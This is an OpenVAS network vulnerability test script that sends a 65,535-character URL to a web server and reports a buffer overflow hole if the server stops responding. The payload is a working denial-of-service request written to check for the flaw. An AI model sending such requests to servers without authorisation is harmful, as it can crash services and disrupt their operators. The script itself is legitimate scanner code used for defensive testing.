###################################################################
# OpenVAS Network Vulnerability Test
#
# WWW Too Long URL
#
# LSS-NVT-2009-004
#
# Developed by LSS Security Team <http://security.lss.hr>
#
# Copyright (C) 2009 LSS <http://www.lss.hr>
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
###################################################################

if (description) {

    script_id(102004);
    script_version("1.2");

    script_name("www too long url");

    desc = "
Remote web server is vulnerable to the too long URL vulnerability. It might be
possible to gain remote access using buffer overflow.

Solution:
Upgrade vulnerable web server to latest version.

Risk factor: High
";
    script_description(desc);

    script_summary("Tries a buffer overflow attack on vulnerable servers");

    script_category(ACT_DENIAL);
    script_family("Buffer overflow");

    script_copyright("Copyright (C) 2009 LSS");
    script_require_ports("Services/www", 80);

    exit(0);
}


include("http_func.inc");

port = get_http_port(default:80);

if (! get_port_state(port)) exit(0);

#send a long url through the http port
req = string("/", crap(65535));
req = http_get(item:req, port:port);
http_send_recv(port:port, data:req);

#ret_code == 0, http up
#ret_code == 1, http down
ret_code = http_is_dead(port:port, retry:2);

if (ret_code == 1){
    #setting kb_item for other plugins
    set_kb_item(name:"www/too_long_url_crash", value:TRUE);
    security_hole(port);
}
else {
    exit(0);
}
